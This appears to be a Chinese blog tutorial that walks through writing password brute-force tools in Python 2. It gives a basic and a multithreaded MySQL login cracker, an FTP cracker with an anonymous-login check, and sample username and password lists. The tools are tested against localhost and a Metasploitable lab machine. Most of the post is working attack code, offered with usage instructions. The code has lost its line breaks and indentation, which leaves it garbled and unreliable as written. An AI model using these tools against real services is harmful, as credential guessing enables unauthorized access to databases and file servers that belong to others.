java学习/网站产品怎么优化

上一篇讲到了如何用Python开发字典，而当我们手里有了字典

就可以进一步去做爆破的任务了，可以用现成的工具，当然也可以自己写

接下来我就要一步一步来写爆破工具！

 

爆破MySQL:

想要爆破MySQL目标至少要允许远程连接

我这里没有开启远程连接，只是爆破本地的MySQL

实际上，如果掌握了如何爆破本地MySQL，那么想要远程爆破MySQL也是很轻松的

 

最基本的实现：

# -*-coding:utf-8 -*-
import pymysqlmysql_username = ('root', 'test', 'admin', 'user')
mysql_password = ('', '123456', 'test', 'root', 'admin', 'xuyiqing', 'user')success = False
host = "127.0.0.1"
port = 3306for username in mysql_username:for password in mysql_password:try:db = pymysql.connect(host, username, password)success = Trueif success:print "用户名:" + username + " 密码:" + password + " 破解成功"except Exception, e:print "用户名:" + username + " 密码:" + password + " 破解失败"pass

 

固定好哪些用户名和哪些密码，以及爆破的IP和端口，直接执行即可

 

进阶的MySQL爆破脚本：写的很完整，支持多线程

# -*-coding:utf-8 -*-
"""
MySQL爆破脚本
用法：
python MysqlCrack2.py -H [目标IP] --u [用户字典] --p [密码字典] -P [端口]
"""
import re
import socket
import optparse
import threadingtry:import pymysql
except ImportError:print "[!] You need to install pymysql module!"print "[!] Usage:pip install pymysql"exit()result_user = None
result_pass = None
threads = []def main():"""处理输入参数:return:None"""print "Welcome to MysqlCrack2"print "Author: Xuyiqing  Version:1.0"parse = optparse.OptionParser('python %prog -H <target host> --u <users dictionary> --p <password dictionary> -P <port>')parse.add_option('-H', dest="target_host", type="string", help='specify the host')parse.add_option('--u', dest='user_dic', type='string', help='specify the dictionary for user')parse.add_option('--p', dest='pwd_dic', type='string', help='specify the dictionary for passwords')parse.add_option('-P', dest='port', type='int', help='specify the port')(options, args) = parse.parse_args()target_host = options.target_hostuser_dic = options.user_dicpwd_dic = options.pwd_dicport = options.portif target_host is not None and re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', target_host):mysql_brute(target_host, user_dic, pwd_dic, port)else:print "[!] Unknown IP\n"exit()def mysql_brute(host, user_dic, pwd_dic, port):"""MySQL暴力破解:param host: 主机:param user_dic: 用户字典:param pwd_dic: 密码字典:param port: 端口:return: None"""print "[*] Target:" + hostprint "[*] Start cracking"userlist = Nonepwdlist = Nonetry:socket.gethostbyname(host)except Exception:print '[*] Cannot connect to %s' % hostexit()try:userlist = [i.strip('\n') for i in open(user_dic, 'r').readlines()]pwdlist = [j.strip('\n') for j in open(pwd_dic, 'r').readlines()]print "[*] Number of users:" + str(len(userlist))print "[*] Number of passwords:" + str(len(pwdlist))except Exception:print "[!] The path of the dictionary file is incorrect"exit()global threadsfor user in userlist:for pwd in pwdlist:t = threading.Thread(target=mysql_login, args=(host, user, pwd, port))t.start()threads.append(t)def mysql_login(host, username, password, port):"""MySQL连接:param host:主机:param username:用户名:param password: 密码:param port: 端口:return: None"""try:db = pymysql.Connect(host=host, port=port, user=username, passwd=password)print "[+] Success! User:" + username + " Password:" + password + "\n"global result_user, result_passresult_user = usernameresult_pass = passworddb.close()exit()except Exception:print "[-] Fail! User:" + username + " Password:" + password + "\n"if __name__ == '__main__':main()for thread in threads:thread.join()if result_user is not None and result_pass is not None:print "[+] Result: %s - %s" % (result_user, result_pass)if result_user is None and result_pass is None:print "[+] Crack Fail"

 

 

 

FTP破解工具开发：

实际去安装一些FTP软件比较困难，我这里就用Metasploitable Linux

启动后默认开启FTP服务，我这里的IP是192.168.232.129

Metaploitable Linux的FTP可以匿名登陆，并且已知一个账号密码为：msfadmin-msfadmin

# -*-coding:utf-8 -*-
import optparse
import ftplib
import threading
import socketdef anony_login(host):"""FTP匿名登陆:param host:主机:return: None"""try:ftp = ftplib.FTP(host)ftp.connect(host, 21, timeout=10)ftp.login('anonymous', 'test@qq.com')ftp.retrlines('LIST')ftp.quit()print "\n[*]" + str(host) + " FTP Anonymous Login Success"except Exception:print "\n[-]" + str(host) + " FTP Anonymous Login Fail"def ftp_login(host, username, password):"""尝试用户密码登陆FTP:param host:主机:param username:用户名:param password:密码:return:None"""try:print "[-] Trying: " + username + "-" + password + "\n"ftp = ftplib.FTP(host)ftp.connect(host, 21, timeout=10)ftp.login(username, password)ftp.retrlines("LIST")ftp.quit()print "Success! " + username + " - " + passwordexcept ftplib.all_errors:passdef brute_force(host, users_file, pwds_file):"""暴力破解:param host: 主机:param users_file:用户字典:param pwds_file: 密码字典:return: None"""users_f = open(users_file, 'r')pwds_f = open(pwds_file, 'r')for user in users_f.readlines():pwds_f.seek(0)for password in pwds_f.readlines():username = user.strip('\n')password = password.strip('\n')t = threading.Thread(target=ftp_login, args=(host, username, password))t.start()def main():"""主函数，处理输入参数:return:None"""parser = optparse.OptionParser('usage%prog -H <target host> -u <users dictionary> -p <password dictionary>')parser.add_option('-H', dest='target_host', type='string', help='specify the host')parser.add_option('-u', dest='user_dic', type='string', help='specify the dictionary for user')parser.add_option('-p', dest='pwd_dic', type='string', help='specify the dictionary for passwords')(options, args) = parser.parse_args()host = options.target_hostuser_dic = options.user_dicpwd_dic = options.pwd_dictry:socket.gethostbyname(host)except Exception:print '[*] Cannot Resolve %s Unknown host' % hostexit()anony_login(host)brute_force(host, user_dic, pwd_dic)if __name__ == '__main__':main()

 

使用的话，需要两个字典：用户字典和密码字典，我随便加入一些东西

username.txt

root
user
admin
msfadmin
manager

 

password.txt

pwd
password
userpass
msfadmin
manager
123456

 

实际使用：-H 输入IP -u 用户名字典 -p 密码字典

 

结果：上边已经找到匿名登陆，还有下图的msfadmin，说明破解成功了